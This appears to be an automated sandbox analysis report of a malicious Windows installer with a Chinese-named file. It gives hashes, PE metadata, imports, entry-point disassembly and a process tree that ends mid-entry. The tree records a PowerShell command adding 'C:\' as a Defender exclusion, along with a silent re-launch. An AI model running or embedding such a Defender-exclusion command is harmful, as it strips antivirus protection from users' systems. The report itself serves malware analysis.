                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):406
                                                        Entropy (8bit):5.117520345541057
                                                        Encrypted:false
                                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                        MD5:9200058492BCA8F9D88B4877F842C148
                                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                        Malicious:false
                                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.921329426572819
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                        • Inno Setup installer (109748/4) 1.08%
                                                        • InstallShield setup (43055/19) 0.42%
                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        File name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        File size:5'707'472 bytes
                                                        MD5:c17bd872bfa6b9e26aa03ad02ceaaca0
                                                        SHA1:a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
                                                        SHA256:43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
                                                        SHA512:16c469e4e465b49c65d248cbc255e14f10e592c69f34284027a459839a129eb37ca75535369993a8d2aa8ce211e5b35974e13f64632257b37efd468b98d61f5f
                                                        SSDEEP:98304:XwREaHL2dH4jfHA43cQSl6GZkZmRzbmeoDWgo6UqI3J+LZotAVtfc0MJsI1dMwZO:lWmH4jfH7dSl6GZkM1Keo6gPUJOoiPMU
                                                        TLSH:98461222F3CBE43EE05D1B3716B2A25494FB7A606522AD5396ECB4ACCF350601D3E647
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                        Icon Hash:0c0c2d33ceec80aa
                                                        Entrypoint:0x4a83bc
                                                        Entrypoint Section:.itext
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:1
                                                        File Version Major:6
                                                        File Version Minor:1
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:1
                                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFA4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor eax, eax
                                                        mov dword ptr [ebp-3Ch], eax
                                                        mov dword ptr [ebp-40h], eax
                                                        mov dword ptr [ebp-5Ch], eax
                                                        mov dword ptr [ebp-30h], eax
                                                        mov dword ptr [ebp-38h], eax
                                                        mov dword ptr [ebp-34h], eax
                                                        mov dword ptr [ebp-2Ch], eax
                                                        mov dword ptr [ebp-28h], eax
                                                        mov dword ptr [ebp-14h], eax
                                                        mov eax, 004A2EBCh
                                                        call 00007F6A28A883D5h
                                                        xor eax, eax
                                                        push ebp
                                                        push 004A8AC1h
                                                        push dword ptr fs:[eax]
                                                        mov dword ptr fs:[eax], esp
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A7Bh
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        mov eax, dword ptr [004B0634h]
                                                        call 00007F6A28B19D5Bh
                                                        call 00007F6A28B198AEh
                                                        lea edx, dword ptr [ebp-14h]
                                                        xor eax, eax
                                                        call 00007F6A28B14588h
                                                        mov edx, dword ptr [ebp-14h]
                                                        mov eax, 004B41F4h
                                                        call 00007F6A28A82483h
                                                        push 00000002h
                                                        push 00000000h
                                                        push 00000001h
                                                        mov ecx, dword ptr [004B41F4h]
                                                        mov dl, 01h
                                                        mov eax, dword ptr [0049CD14h]
                                                        call 00007F6A28B158B3h
                                                        mov dword ptr [004B41F8h], eax
                                                        xor edx, edx
                                                        push ebp
                                                        push 004A8A27h
                                                        push dword ptr fs:[edx]
                                                        mov dword ptr fs:[edx], esp
                                                        call 00007F6A28B19DE3h
                                                        mov dword ptr [004B4200h], eax
                                                        mov eax, dword ptr [004B4200h]
                                                        cmp dword ptr [eax+0Ch], 01h
                                                        jne 00007F6A28B20ACAh
                                                        mov eax, dword ptr [004B4200h]
                                                        mov edx, 00000028h
                                                        call 00007F6A28B161A8h
                                                        mov edx, dword ptr [004B4200h]
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xcb0000x110000x11000d767418641bf302610db416464cb7807False0.18785903033088236data3.721360641780582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                        RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                        RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                        RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                        RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                        RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                        RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                        RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                        RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                        RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                        RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                        RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                        RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                        RT_STRING0xd8e000x3f8data0.3198818897637795
                                                        RT_STRING0xd91f80x2dcdata0.36475409836065575
                                                        RT_STRING0xd94d40x430data0.40578358208955223
                                                        RT_STRING0xd99040x44cdata0.38636363636363635
                                                        RT_STRING0xd9d500x2d4data0.39226519337016574
                                                        RT_STRING0xda0240xb8data0.6467391304347826
                                                        RT_STRING0xda0dc0x9cdata0.6410256410256411
                                                        RT_STRING0xda1780x374data0.4230769230769231
                                                        RT_STRING0xda4ec0x398data0.3358695652173913
                                                        RT_STRING0xda8840x368data0.3795871559633027
                                                        RT_STRING0xdabec0x2a4data0.4275147928994083
                                                        RT_RCDATA0xdae900x10data1.5
                                                        RT_RCDATA0xdaea00x310data0.6173469387755102
                                                        RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                                        RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                                        RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                                        RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                        DLLImport
                                                        kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                        comctl32.dllInitCommonControls
                                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                        advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                        NameOrdinalAddress
                                                        __dbk_fcall_wrapper20x40fc10
                                                        dbkFCallWrapperAddr10x4b063c
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        No network behavior found

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:01:52:42
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                        Imagebase:0xf10000
                                                        File size:5'707'472 bytes
                                                        MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:01:52:43
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                        Imagebase:0xf60000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:01:52:43
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                        Imagebase:0x7ff6cb6b0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:01:52:43
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:01:52:47
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff605670000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:01:52:51
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                        Imagebase:0xf10000
                                                        File size:5'707'472 bytes
                                                        MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:01:52:52
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                        Imagebase:0x8b0000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:01:52:54
